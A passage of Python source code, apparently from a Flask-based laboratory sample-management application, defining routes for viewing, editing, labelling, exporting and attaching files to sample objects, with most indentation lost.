                    # The form allows notations like '1.2e1' for '12'; however,
                    # Python can only parse these as floats
num_objects_in_batch = float(form_data['input_num_batch_objects'])
if num_objects_in_batch == int(num_objects_in_batch):
num_objects_in_batch = int(num_objects_in_batch)
else:
raise
                except ValueError:
                    errors.append('input_num_batch_objects')
                    num_objects_in_batch = None
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
if 'previous_actions' in flask.request.form:
try:
previous_actions = serializer.loads(flask.request.form['previous_actions'])
except itsdangerous.BadData:
flask.abort(400)
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
referencable_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.READ
)
        if obj is not None:
referencable_objects = [
referencable_object
for referencable_object in referencable_objects
if referencable_object.object_id != object_id
]
else:
referencable_objects = []
sorted_actions = get_sorted_actions_for_user(
user_id=flask_login.current_user.id
)
for action in sorted_actions:
db.session.expunge(action)
action_type_id_by_action_id = {}
for action_type in get_action_types():
for action in get_actions(action_type.id):
action_type_id_by_action_id[action.id] = action_type.id
tags = [{'name': tag.name, 'uses': tag.uses} for tag in logic.tags.get_tags()]
users = get_users(exclude_hidden=True)
users.sort(key=lambda user: user.id)
english = get_language(Language.ENGLISH)
form_kwargs = {
"errors": errors,
"object_errors": object_errors,
"form_data": form_data,
"previous_actions": serializer.dumps(previous_actions),
"form": form,
"referencable_objects": referencable_objects,
"sorted_actions": sorted_actions,
"action_type_id_by_action_id": action_type_id_by_action_id,
"ActionType": models.ActionType,
"datetime": datetime,
"tags": tags,
"users": users,
"mode": 'edit',
"languages": get_languages(),
"ENGLISH": english
}
kwargs = {**view_kwargs, **form_kwargs}
return flask.render_template('objects/inline_edit/inline_edit_base.html', **kwargs)
def get_object_if_current_user_has_read_permissions(object_id):
user_id = flask_login.current_user.id
try:
permissions = get_user_object_permissions(object_id, user_id)
except ObjectDoesNotExistError:
return None
if Permissions.READ not in permissions:
return None
return get_object(object_id)
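# Object page: depending on the 'mode' argument and the user's permissions this
# shows the object view, the inline edit view or the full edit/upgrade form.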
@frontend.route('/objects/<int:object_id>', methods=['GET', 'POST'])
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object(object_id):
object = get_object(object_id=object_id)
related_objects_tree = logic.object_relationships.build_related_objects_tree(object_id, flask_login.current_user.id)
user_language_id = get_user_language(flask_login.current_user).id
english = get_language(Language.ENGLISH)
object_languages = set()
user_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
user_may_edit = Permissions.WRITE in user_permissions
user_may_grant = Permissions.GRANT in user_permissions
user_may_use_as_template = Permissions.READ in get_user_action_permissions(object.action_id, user_id=flask_login.current_user.id)
action = get_action_with_translation_in_language(object.action_id, user_language_id, use_fallback=True)
    new_schema_available = action.schema != object.schema
if not user_may_edit and flask.request.args.get('mode', '') == 'edit':
return flask.abort(403)
if not user_may_edit and flask.request.args.get('mode', '') == 'upgrade':
return flask.abort(403)
if not flask.current_app.config['DISABLE_INLINE_EDIT']:
if not user_may_edit and flask.request.args.get('mode', '') == 'inline_edit':
return flask.abort(403)
if user_may_edit and flask.request.method == 'GET' and flask.request.args.get('mode', '') in {'', 'inline_edit'}:
return show_inline_edit(object, get_action(object.action_id))
if flask.request.method == 'GET' and flask.request.args.get('mode', '') not in ('edit', 'upgrade'):
instrument = get_instrument_with_translation_in_language(action.instrument_id, user_language_id) if action.instrument else None
object_type = get_action_type_with_translation_in_language(
action_type_id=action.type_id,
language_id=user_language_id
).translation.object_name
object_log_entries = object_log.get_object_log_entries(object_id=object_id, user_id=flask_login.current_user.id)
dataverse_enabled = bool(flask.current_app.config['DATAVERSE_URL'])
if dataverse_enabled:
dataverse_url = logic.dataverse_export.get_dataverse_url(object_id)
show_dataverse_export = user_may_grant and not dataverse_url
else:
dataverse_url = None
show_dataverse_export = False
if user_may_edit:
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
token = serializer.dumps([flask_login.current_user.id, object_id])
mobile_upload_url = flask.url_for('.mobile_file_upload', object_id=object_id, token=token, _external=True)
mobile_upload_qrcode = generate_qrcode(mobile_upload_url, should_cache=False)
else:
mobile_upload_url = None
mobile_upload_qrcode = None
object_url = flask.url_for('.object', object_id=object_id, _external=True)
object_qrcode = generate_qrcode(object_url, should_cache=True)
location_form = ObjectLocationAssignmentForm()
locations_map, locations_tree = get_locations_tree()
locations = [('-1', '—')]
unvisited_location_ids_prefixes_and_subtrees = [(location_id, '', locations_tree[location_id]) for location_id in locations_tree]
while unvisited_location_ids_prefixes_and_subtrees:
location_id, prefix, subtree = unvisited_location_ids_prefixes_and_subtrees.pop(0)
location = locations_map[location_id]
locations.append((str(location_id), '{}{} (#{})'.format(prefix, get_translated_text(location.name), location.id)))
for location_id in sorted(subtree, key=lambda location_id: get_translated_text(locations_map[location_id].name), reverse=True):
unvisited_location_ids_prefixes_and_subtrees.insert(0, (location_id, '{}{} / '.format(prefix, get_translated_text(location.name)), subtree[location_id]))
location_form.location.choices = locations
possible_responsible_users = [('-1', '—')]
for user in logic.users.get_users(exclude_hidden=True):
possible_responsible_users.append((str(user.id), '{} (#{})'.format(user.name, user.id)))
location_form.responsible_user.choices = possible_responsible_users
measurement_actions = logic.action_translations.get_actions_with_translation_in_language(user_language_id, models.ActionType.MEASUREMENT, use_fallback=True)
favorite_action_ids = logic.favorites.get_user_favorite_action_ids(flask_login.current_user.id)
favorite_measurement_actions = [
action
for action in measurement_actions
if action.id in favorite_action_ids and not action.is_hidden
]
        # Sort by: user name (actions without a user first), instrument name (independent actions first), action name
favorite_measurement_actions.sort(key=lambda action: (
action.user.name.lower() if action.user else '',
get_instrument_with_translation_in_language(action.instrument_id, user_language_id).translation.name.lower() if action.instrument else '',
action.translation.name.lower()
))
publication_form = ObjectPublicationForm()
object_publications = logic.publications.get_publications_for_object(object_id=object.id)
user_may_link_publication = Permissions.WRITE in user_permissions
notebook_templates = get_notebook_templates(
object_id=object.id,
data=object.data,
schema=object.schema,
user_id=flask_login.current_user.id
)
linked_project = logic.projects.get_project_linked_to_object(object_id)
object_languages = logic.languages.get_languages_in_object_data(object.data)
languages = []
for lang_code in object_languages:
languages.append(get_language_by_lang_code(lang_code))
all_languages = get_languages()
metadata_language = flask.request.args.get('language', None)
if not any(
language.lang_code == metadata_language
for language in languages
):
metadata_language = None
return flask.render_template(
'objects/view/base.html',
template_mode="view",
show_object_type_and_id_on_object_page_text=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TYPE_AND_ID_ON_OBJECT_PAGE"],
show_object_title=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TITLE"],
measurement_type_name=logic.action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=logic.actions.models.ActionType.MEASUREMENT,
language_id=logic.languages.get_user_language(flask_login.current_user).id,
use_fallback=True
).name,
metadata_language=metadata_language,
languages=languages,
all_languages=all_languages,
SUPPORTED_LOCALES=logic.locale.SUPPORTED_LOCALES,
ENGLISH=english,
object_type=object_type,
action=action,
action_type=get_action_type_with_translation_in_language(action.type_id, user_language_id),
instrument=instrument,
schema=object.schema,
data=object.data,
object_log_entries=object_log_entries,
ObjectLogEntryType=ObjectLogEntryType,
last_edit_datetime=object.utc_datetime,
last_edit_user=get_user(object.user_id),
object_id=object_id,
user_may_edit=user_may_edit,
user_may_comment=user_may_edit,
comments=comments.get_comments_for_object(object_id),
comment_form=CommentForm(),
files=logic.files.get_files_for_object(object_id),
file_source_instrument_exists=False,
file_source_jupyterhub_exists=False,
file_form=FileForm(),
external_link_form=ExternalLinkForm(),
external_link_invalid='invalid_link' in flask.request.args,
mobile_upload_url=mobile_upload_url,
mobile_upload_qrcode=mobile_upload_qrcode,
notebook_templates=notebook_templates,
object_qrcode=object_qrcode,
object_url=object_url,
restore_form=None,
version_id=object.version_id,
user_may_grant=user_may_grant,
favorite_measurement_actions=favorite_measurement_actions,
FileLogEntryType=FileLogEntryType,
file_information_form=FileInformationForm(),
file_hiding_form=FileHidingForm(),
new_schema_available=new_schema_available,
related_objects_tree=related_objects_tree,
object_publications=object_publications,
user_may_link_publication=user_may_link_publication,
user_may_use_as_template=user_may_use_as_template,
show_dataverse_export=show_dataverse_export,
dataverse_url=dataverse_url,
publication_form=publication_form,
get_object=get_object,
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
get_object_location_assignment=get_object_location_assignment,
get_user=get_user,
get_location=get_location,
PAGE_SIZES=PAGE_SIZES,
HORIZONTAL_LABEL_MARGIN=HORIZONTAL_LABEL_MARGIN,
VERTICAL_LABEL_MARGIN=VERTICAL_LABEL_MARGIN,
mm=mm,
object_location_assignments=get_object_location_assignments(object_id),
build_object_location_assignment_confirmation_url=build_object_location_assignment_confirmation_url,
user_may_assign_location=user_may_edit,
location_form=location_form,
project=linked_project,
get_project=get_project_if_it_exists,
get_action_type=get_action_type,
get_action_type_with_translation_in_language=get_action_type_with_translation_in_language,
get_instrument_with_translation_in_language=get_instrument_with_translation_in_language
)
check_current_user_is_not_readonly()
if flask.request.args.get('mode', '') == 'upgrade':
should_upgrade_schema = True
else:
should_upgrade_schema = False
return show_object_form(object, action=get_action(object.action_id), should_upgrade_schema=should_upgrade_schema)
@frontend.route('/objects/<int:object_id>/dc.rdf')
@frontend.route('/objects/<int:object_id>/versions/<int:version_id>/dc.rdf')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_rdf(object_id, version_id=None):
rdf_xml = logic.rdf.generate_rdf(flask_login.current_user.id, object_id, version_id)
return flask.Response(
rdf_xml,
mimetype='application/rdf+xml',
)
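# Create a printable PDF with labels for an object; the 'mode' argument selects
# fixed-width, minimum-height or mixed label layouts.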
@frontend.route('/objects/<int:object_id>/label')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def print_object_label(object_id):
mode = flask.request.args.get('mode', 'mixed')
if mode == 'fixed-width':
create_mixed_labels = False
create_long_labels = False
include_qrcode_in_long_labels = None
paper_format = flask.request.args.get('width-paper-format', '')
if paper_format not in PAGE_SIZES:
paper_format = DEFAULT_PAPER_FORMAT
maximum_width = math.floor(PAGE_SIZES[paper_format][0] / mm - 2 * HORIZONTAL_LABEL_MARGIN)
maximum_height = math.floor(PAGE_SIZES[paper_format][1] / mm - 2 * VERTICAL_LABEL_MARGIN)
ghs_classes_side_by_side = 'side-by-side' in flask.request.args
label_minimum_width = 20
if ghs_classes_side_by_side:
label_minimum_width = 40
try:
label_width = float(flask.request.args.get('label-width', '20'))
except ValueError:
label_width = 0
if math.isnan(label_width):
label_width = 0
if label_width < label_minimum_width:
label_width = label_minimum_width
if label_width > maximum_width:
label_width = maximum_width
try:
label_minimum_height = float(flask.request.args.get('label-minimum-height', '0'))
except ValueError:
label_minimum_height = 0
if math.isnan(label_minimum_height):
label_minimum_height = 0
if label_minimum_height < 0:
label_minimum_height = 0
if label_minimum_height > maximum_height:
label_minimum_height = maximum_height
qrcode_width = 18
centered = 'centered' in flask.request.args
elif mode == 'minimum-height':
create_mixed_labels = False
create_long_labels = True
paper_format = flask.request.args.get('height-paper-format', '')
if paper_format not in PAGE_SIZES:
paper_format = DEFAULT_PAPER_FORMAT
maximum_width = math.floor(PAGE_SIZES[paper_format][0] / mm - 2 * HORIZONTAL_LABEL_MARGIN)
include_qrcode_in_long_labels = 'include-qrcode' in flask.request.args
label_width = 0
label_minimum_height = 0
try:
label_minimum_width = float(flask.request.args.get('label-minimum-width', '0'))
except ValueError:
label_minimum_width = 0
if math.isnan(label_minimum_width):
label_minimum_width = 0
if label_minimum_width < 0:
label_minimum_width = 0
if label_minimum_width > maximum_width:
label_minimum_width = maximum_width
qrcode_width = 0
ghs_classes_side_by_side = None
centered = None
else:
create_mixed_labels = True
create_long_labels = None
include_qrcode_in_long_labels = None
paper_format = flask.request.args.get('mixed-paper-format', '')
if paper_format not in PAGE_SIZES:
paper_format = DEFAULT_PAPER_FORMAT
label_width = 0
label_minimum_height = 0
qrcode_width = 0
label_minimum_width = 0
ghs_classes_side_by_side = None
centered = None
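    # Gather the label contents: creation date and user from the object log
    # (or the 'created' property), the object name, its URL and any GHS hazards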
object = get_object(object_id=object_id)
object_log_entries = object_log.get_object_log_entries(object_id=object_id, user_id=flask_login.current_user.id)
for object_log_entry in object_log_entries:
if object_log_entry.type in (ObjectLogEntryType.CREATE_OBJECT, ObjectLogEntryType.CREATE_BATCH):
creation_date = object_log_entry.utc_datetime.strftime('%Y-%m-%d')
creation_user = get_user(object_log_entry.user_id).name
break
else:
creation_date = _('Unknown')
creation_user = _('Unknown')
if 'created' in object.data and '_type' in object.data['created'] and object.data['created']['_type'] == 'datetime':
creation_date = object.data['created']['utc_datetime'].split(' ')[0]
if 'name' in object.data and '_type' in object.data['name'] and object.data['name']['_type'] == 'text':
object_name = get_translated_text(object.data['name']['text'])
else:
object_name = _('Unknown Object')
object_url = flask.url_for('.object', object_id=object_id, _external=True)
if 'hazards' in object.data and '_type' in object.data['hazards'] and object.data['hazards']['_type'] == 'hazards':
hazards = object.data['hazards']['hazards']
else:
hazards = []
pdf_data = create_labels(
object_id=object_id,
object_name=object_name,
object_url=object_url,
creation_user=creation_user,
creation_date=creation_date,
ghs_classes=hazards,
paper_format=paper_format,
create_mixed_labels=create_mixed_labels,
create_long_labels=create_long_labels,
include_qrcode_in_long_labels=include_qrcode_in_long_labels,
label_width=label_width,
label_minimum_height=label_minimum_height,
label_minimum_width=label_minimum_width,
qrcode_width=qrcode_width,
ghs_classes_side_by_side=ghs_classes_side_by_side,
centered=centered
)
return flask.send_file(
io.BytesIO(pdf_data),
mimetype='application/pdf',
cache_timeout=-1
)
@frontend.route('/objects/<int:object_id>/comments/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_comments(object_id):
check_current_user_is_not_readonly()
comment_form = CommentForm()
if comment_form.validate_on_submit():
content = comment_form.content.data
comments.create_comment(object_id=object_id, user_id=flask_login.current_user.id, content=content)
flask.flash(_('Successfully posted a comment.'), 'success')
else:
flask.flash(_('Please enter a comment text.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
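# Search page: collect the searchable property paths and their types, both per
# action and per action type.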
@frontend.route('/objects/search/')
@flask_login.login_required
def search():
actions = get_sorted_actions_for_user(
user_id=flask_login.current_user.id
)
user_language_id = get_user_language(flask_login.current_user).id
action_types = get_action_types_with_translations_in_language(user_language_id)
search_paths = {}
search_paths_by_action = {}
search_paths_by_action_type = {}
for action_type in action_types:
search_paths_by_action_type[action_type.id] = {}
for action in actions:
search_paths_by_action[action.id] = {}
if action.type_id not in search_paths_by_action_type:
search_paths_by_action_type[action.type_id] = {}
for property_path, property_type in logic.schemas.utils.get_property_paths_for_schema(
schema=action.schema,
valid_property_types={'text', 'bool', 'quantity', 'datetime'}
).items():
property_path = '.'.join(
key if key is not None else '?'
for key in property_path
)
search_paths_by_action[action.id][property_path] = [property_type]
if property_path not in search_paths_by_action_type[action.type_id]:
search_paths_by_action_type[action.type_id][property_path] = [property_type]
elif property_type not in search_paths_by_action_type[action.type_id][property_path]:
search_paths_by_action_type[action.type_id][property_path].append(property_type)
if property_path not in search_paths:
search_paths[property_path] = [property_type]
elif property_type not in search_paths[property_path]:
search_paths[property_path].append(property_type)
return flask.render_template(
'search.html',
search_paths=search_paths,
search_paths_by_action=search_paths_by_action,
search_paths_by_action_type=search_paths_by_action_type,
actions=actions,
action_types=action_types,
datetime=datetime
), 200, {
'Cache-Control': 'no-cache, no-store, must-revalidate',
'Pragma': 'no-cache',
'Expires': '0'
}
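# Return the objects the current user may reference (with at least the requested
# permission level) as JSON.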
@frontend.route('/objects/referencable')
@flask_login.login_required
def referencable_objects():
required_perm = Permissions.READ
if 'required_perm' in flask.request.args:
try:
required_perm = Permissions.from_name(flask.request.args['required_perm'])
except ValueError:
try:
required_perm = Permissions(int(flask.request.args['required_perm']))
except ValueError:
return {
"message": "argument {} is not a valid permission.".format(flask.request.args['required_perm'])
}, 400
referencable_objects = get_object_info_with_permissions(
user_id=flask_login.current_user.id,
permissions=required_perm,
)
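    # Convert each object info record into a JSON-serializable dict with its id,
    # an escaped display label, action id, maximum permission and tags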
def dictify(x):
return {
'id': x.object_id,
'text': flask.escape('{} (#{})'.format(get_translated_text(x.name_json), x.object_id)),
'action_id': x.action_id,
'max_permission': x.max_permission,
'tags': [flask.escape(tag) for tag in x.tags['tags']] if x.tags and isinstance(x.tags, dict) and x.tags.get('_type') == 'tags' and x.tags.get('tags') else []
}
return {'referencable_objects': [dictify(x) for x in referencable_objects]}
@frontend.route('/objects/<int:object_id>/permissions/request', methods=['POST'])
@flask_login.login_required
def object_permissions_request(object_id):
current_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
if Permissions.READ in current_permissions:
flask.flash(_('You already have permissions to access this object.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
request_object_permissions(flask_login.current_user.id, object_id)
flask.flash(_('Your request for permissions has been sent.'), 'success')
return flask.redirect(flask.url_for('.objects'))
@frontend.route('/objects/<int:object_id>/locations/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_location(object_id):
check_current_user_is_not_readonly()
location_form = ObjectLocationAssignmentForm()
location_form.location.choices = [('-1', '—')] + [
        (str(location.id), '{} (#{})'.format(get_translated_text(location.name), location.id))
for location in get_locations()
]
possible_responsible_users = [('-1', '—')]
for user in logic.users.get_users(exclude_hidden=True):
possible_responsible_users.append((str(user.id), '{} (#{})'.format(user.name, user.id)))
location_form.responsible_user.choices = possible_responsible_users
if location_form.validate_on_submit():
location_id = int(location_form.location.data)
if location_id < 0:
location_id = None
responsible_user_id = int(location_form.responsible_user.data)
if responsible_user_id < 0:
responsible_user_id = None
description = location_form.description.data
try:
description = json.loads(description)
except Exception:
description = {}
valid_description = {'en': ''}
for language_code, description_text in description.items():
if not isinstance(language_code, str):
continue
try:
language = get_language_by_lang_code(language_code)
except logic.errors.LanguageDoesNotExistError:
continue
if not language.enabled_for_input:
continue
valid_description[language_code] = description_text
description = valid_description
if location_id is not None or responsible_user_id is not None:
assign_location_to_object(object_id, location_id, responsible_user_id, flask_login.current_user.id, description)
flask.flash(_('Successfully assigned a new location to this object.'), 'success')
else:
flask.flash(_('Please select a location or a responsible user.'), 'error')
else:
flask.flash(_('Please select a location or a responsible user.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
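# Link a publication (identified by its DOI) to an object, or update the title
# and object name stored for an existing link.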
@frontend.route('/objects/<int:object_id>/publications/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_publication(object_id):
check_current_user_is_not_readonly()
publication_form = ObjectPublicationForm()
if publication_form.validate_on_submit():
doi = publication_form.doi.data
title = publication_form.title.data
object_name = publication_form.object_name.data
if title is not None:
title = title.strip()
if not title:
title = None
if object_name is not None:
object_name = object_name.strip()
if not object_name:
object_name = None
existing_publication = ([
publication
for publication in logic.publications.get_publications_for_object(object_id)
if publication.doi == doi
] or [None])[0]
if existing_publication is not None and existing_publication.title == title and existing_publication.object_name == object_name:
flask.flash(_('This object has already been linked to this publication.'), 'info')
else:
logic.publications.link_publication_to_object(user_id=flask_login.current_user.id, object_id=object_id, doi=doi, title=title, object_name=object_name)
if existing_publication is None:
flask.flash(_('Successfully linked this object to a publication.'), 'success')
else:
flask.flash(_('Successfully updated the information for this publication.'), 'success')
else:
flask.flash(_('Please enter a valid DOI for the publication you want to link this object to.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
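# Export one or more objects as a PDF or in one of the formats defined in
# logic.export.FILE_FORMATS.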
@frontend.route('/objects/<int:object_id>/export')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def export_data(object_id):
object_ids = [object_id]
file_extension = flask.request.args.get('format', '.pdf')
if file_extension != '.pdf' and file_extension not in logic.export.FILE_FORMATS:
return flask.abort(400)
if 'object_ids' in flask.request.args:
try:
object_ids = json.loads(flask.request.args['object_ids'])
object_ids = [int(i) for i in object_ids]
if any((Permissions.READ not in get_user_object_permissions(i, flask_login.current_user.id)) for i in object_ids):
return flask.abort(400)
except Exception:
return flask.abort(400)
if not object_ids:
return flask.abort(400)
if file_extension == '.pdf':
sections = pdfexport.SECTIONS
if 'sections' in flask.request.args:
try:
sections = sections.intersection(json.loads(flask.request.args['sections']))
except Exception:
return flask.abort(400)
if 'language' in flask.request.args:
try:
lang_code = flask.request.args['language']
if lang_code not in logic.locale.SUPPORTED_LOCALES:
raise ValueError()
language = logic.languages.get_language_by_lang_code(lang_code)
if not language.enabled_for_user_interface:
raise ValueError()
except Exception:
lang_code = 'en'
else:
lang_code = 'en'
pdf_data = pdfexport.create_pdfexport(object_ids, sections, lang_code)
file_bytes = io.BytesIO(pdf_data)
elif file_extension in logic.export.FILE_FORMATS:
file_bytes = logic.export.FILE_FORMATS[file_extension][1](flask_login.current_user.id, object_ids=object_ids)
else:
file_bytes = None
if file_bytes:
return flask.Response(
file_bytes,
200,
headers={
'Content-Disposition': f'attachment; filename=sampledb_export{file_extension}',
'Content-Type': 'application/pdf' if file_extension == '.pdf' else logic.export.FILE_FORMATS[file_extension][2]
}
)
return flask.abort(500)
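# Download all non-hidden local/database files of an object as a ZIP archive.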
@frontend.route('/objects/<int:object_id>/files/')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_files(object_id):
files = logic.files.get_files_for_object(object_id)
zip_bytes = io.BytesIO()
with zipfile.ZipFile(zip_bytes, 'w') as zip_file:
for file in files:
if file.is_hidden:
continue
if file.storage in {'local', 'database'}:
try:
file_bytes = file.open(read_only=True).read()
except Exception:
pass
else:
zip_file.writestr(os.path.basename(file.original_file_name), file_bytes)
return flask.Response(
zip_bytes.getvalue(),
200,
headers={
'Content-Type': 'application/zip',
'Content-Disposition': f'attachment; filename=object_{object_id}_files.zip'
}
)
@frontend.route('/objects/<int:object_id>/files/<int:file_id>', methods=['GET'])
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_file(object_id, file_id):
file = logic.files.get_file_for_object(object_id, file_id)
if file is None:
return flask.abort(404)
if file.is_hidden:
return flask.abort(403)
if file.storage in ('local', 'database'):
if 'preview' in flask.request.args:
file_extension = os.path.splitext(file.original_file_name)[1]
mime_type = flask.current_app.config.get('MIME_TYPES', {}).get(file_extension, None)
if mime_type is not None:
return flask.send_file(file.open(), mimetype=mime_type, last_modified=file.utc_datetime)
return flask.send_file(file.open(), as_attachment=True, attachment_filename=file.original_file_name, last_modified=file.utc_datetime)
# TODO: better error handling
return flask.abort(404)
@frontend.route('/objects/<int:object_id>/files/<int:file_id>', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def update_file_information(object_id, file_id):
check_current_user_is_not_readonly()
form = FileInformationForm()
if not form.validate_on_submit():
return flask.abort(400)
title = form.title.data
description = form.description.data
try:
logic.files.update_file_information(
object_id=object_id,
file_id=file_id,
user_id=flask_login.current_user.id,
title=title,
description=description
)
except logic.errors.FileDoesNotExistError:
return flask.abort(404)
return flask.redirect(flask.url_for('.object', object_id=object_id, _anchor='file-{}'.format(file_id)))
@frontend.route('/objects/<int:object_id>/files/<int:file_id>/hide', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def hide_file(object_id, file_id):
check_current_user_is_not_readonly()
form = FileHidingForm()
if not form.validate_on_submit():
return flask.abort(400)
reason = form.reason.data
try:
logic.files.hide_file(
object_id=object_id,
file_id=file_id,
user_id=flask_login.current_user.id,
reason=reason
)
except logic.errors.FileDoesNotExistError:
return flask.abort(404)
flask.flash(_('The file was hidden successfully.'), 'success')
return flask.redirect(flask.url_for('.object', object_id=object_id, _anchor='file-{}'.format(file_id)))
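# Mobile file upload using a signed, time-limited token that is embedded in a
# QR code on the object page.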
@frontend.route('/objects/<int:object_id>/files/mobile_upload/<token>', methods=['GET'])
def mobile_file_upload(object_id: int, token: str):
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
try:
user_id, object_id = serializer.loads(token, max_age=15 * 60)
except itsdangerous.BadSignature:
return flask.abort(400)
try:
user = logic.users.get_user(user_id)
except UserDoesNotExistError:
return flask.abort(403)
if user.is_readonly:
return flask.abort(403)
return flask.render_template('mobile_upload.html')
@frontend.route('/objects/<int:object_id>/files/mobile_upload/<token>', methods=['POST'])
def post_mobile_file_upload(object_id: int, token: str):
serializer = itsdangerous.URLSafeTimedSerializer(flask.current_app.config['SECRET_KEY'], salt='mobile-upload')
try:
user_id, object_id = serializer.loads(token, max_age=15 * 60)
except itsdangerous.BadSignature:
return flask.abort(400)
try:
user = logic.users.get_user(user_id)
except UserDoesNotExistError:
return flask.abort(403)
if user.is_readonly:
return flask.abort(403)
files = flask.request.files.getlist('file_input')
if not files:
return flask.redirect(
flask.url_for(
'.mobile_file_upload',
object_id=object_id,
token=token
)
)
for file_storage in files:
file_name = werkzeug.utils.secure_filename(file_storage.filename)
logic.files.create_database_file(object_id, user_id, file_name, lambda stream: file_storage.save(dst=stream))
return flask.render_template('mobile_upload_success.html')
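# Handle file uploads and external links posted for an object.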
@frontend.route('/objects/<int:object_id>/files/', methods=['POST'])
@object_permissions_required(Permissions.WRITE)
def post_object_files(object_id):
check_current_user_is_not_readonly()
external_link_form = ExternalLinkForm()
file_form = FileForm()
if file_form.validate_on_submit():
file_source = file_form.file_source.data
if file_source == 'local':
files = flask.request.files.getlist(file_form.local_files.name)
for file_storage in files:
file_name = werkzeug.utils.secure_filename(file_storage.filename)
logic.files.create_database_file(object_id, flask_login.current_user.id, file_name, lambda stream: file_storage.save(dst=stream))
flask.flash(_('Successfully uploaded files.'), 'success')
else:
flask.flash(_('Failed to upload files.'), 'error')
elif external_link_form.validate_on_submit():
url = external_link_form.url.data
logic.files.create_url_file(object_id, flask_login.current_user.id, url)
flask.flash(_('Successfully posted link.'), 'success')
elif external_link_form.errors:
flask.flash(_('Failed to post link.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id, invalid_link=True, _anchor='anchor-post-link'))
else:
flask.flash(_('Failed to upload files.'), 'error')
return flask.redirect(flask.url_for('.object', object_id=object_id))
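# Create a new object from an action, optionally using a previous object as a
# template; a valid sample_id pre-fills a top-level 'sample' property.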
@frontend.route('/objects/new', methods=['GET', 'POST'])
@flask_login.login_required
def new_object():
check_current_user_is_not_readonly()
action_id = flask.request.args.get('action_id', None)
previous_object_id = flask.request.args.get('previous_object_id', None)
if not action_id and not previous_object_id:
# TODO: handle error
return flask.abort(404)
sample_id = flask.request.args.get('sample_id', None)
previous_object = None
action = None
if previous_object_id:
try:
previous_object = get_object(previous_object_id)
except ObjectDoesNotExistError:
flask.flash(_("This object does not exist."), 'error')
return flask.abort(404)
if Permissions.READ not in get_user_object_permissions(user_id=flask_login.current_user.id, object_id=previous_object_id):
flask.flash(_("You do not have the required permissions to use this object as a template."), 'error')
return flask.abort(403)
if action_id:
if action_id != str(previous_object.action_id):
flask.flash(_("This object was created with a different action."), 'error')
return flask.abort(400)
else:
action_id = previous_object.action_id
if action_id:
try:
action = get_action(action_id)
except ActionDoesNotExistError:
flask.flash(_("This action does not exist."), 'error')
return flask.abort(404)
if Permissions.READ not in get_user_action_permissions(action_id, user_id=flask_login.current_user.id):
flask.flash(_("You do not have the required permissions to use this action."), 'error')
return flask.abort(403)
placeholder_data = {}
if sample_id is not None:
try:
sample_id = int(sample_id)
except ValueError:
sample_id = None
else:
if sample_id <= 0:
sample_id = None
if sample_id is not None:
try:
logic.objects.get_object(sample_id)
except logic.errors.ObjectDoesNotExistError:
sample_id = None
if sample_id is not None:
if action.schema.get('properties', {}).get('sample', {}).get('type', '') == 'sample':
placeholder_data = {
('sample', ): {'_type': 'sample', 'object_id': sample_id}
}
# TODO: check instrument permissions
return show_object_form(None, action, previous_object, placeholder_data=placeholder_data)
@frontend.route('/objects/<int:object_id>/versions/')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_versions(object_id):
object = get_object(object_id=object_id)
if object is None:
return flask.abort(404)
object_versions = get_object_versions(object_id=object_id)
object_versions.sort(key=lambda object_version: -object_version.version_id)
return flask.render_template('objects/object_versions.html', get_user=get_user, object=object, object_versions=object_versions)
@frontend.route('/objects/<int:object_id>/versions/<int:version_id>')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_version(object_id, version_id):
user_language_id = logic.languages.get_user_language(flask_login.current_user).id
english = get_language(Language.ENGLISH)
object = get_object(object_id=object_id, version_id=version_id)
form = None
user_permissions = get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id)
if Permissions.WRITE in user_permissions:
current_object = get_object(object_id=object_id)
if current_object.version_id != version_id:
form = ObjectVersionRestoreForm()
user_may_grant = Permissions.GRANT in user_permissions
action = get_action_with_translation_in_language(object.action_id, user_language_id, use_fallback=True)
action_type = get_action_type_with_translation_in_language(action.type_id, user_language_id)
instrument = get_instrument_with_translation_in_language(action.instrument_id, user_language_id) if action.instrument_id else None
object_languages = logic.languages.get_languages_in_object_data(object.data)
languages = []
for lang_code in object_languages:
languages.append(get_language_by_lang_code(lang_code))
metadata_language = flask.request.args.get('language', None)
if not any(
language.lang_code == metadata_language
for language in languages
):
metadata_language = None
return flask.render_template(
'objects/view/base.html',
template_mode="view",
show_object_type_and_id_on_object_page_text=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TYPE_AND_ID_ON_OBJECT_PAGE"],
show_object_title=get_user_settings(flask_login.current_user.id)["SHOW_OBJECT_TITLE"],
languages=languages,
metadata_language=metadata_language,
ENGLISH=english,
is_archived=True,
object_type=action_type.translation.object_name,
action=action,
action_type=action_type,
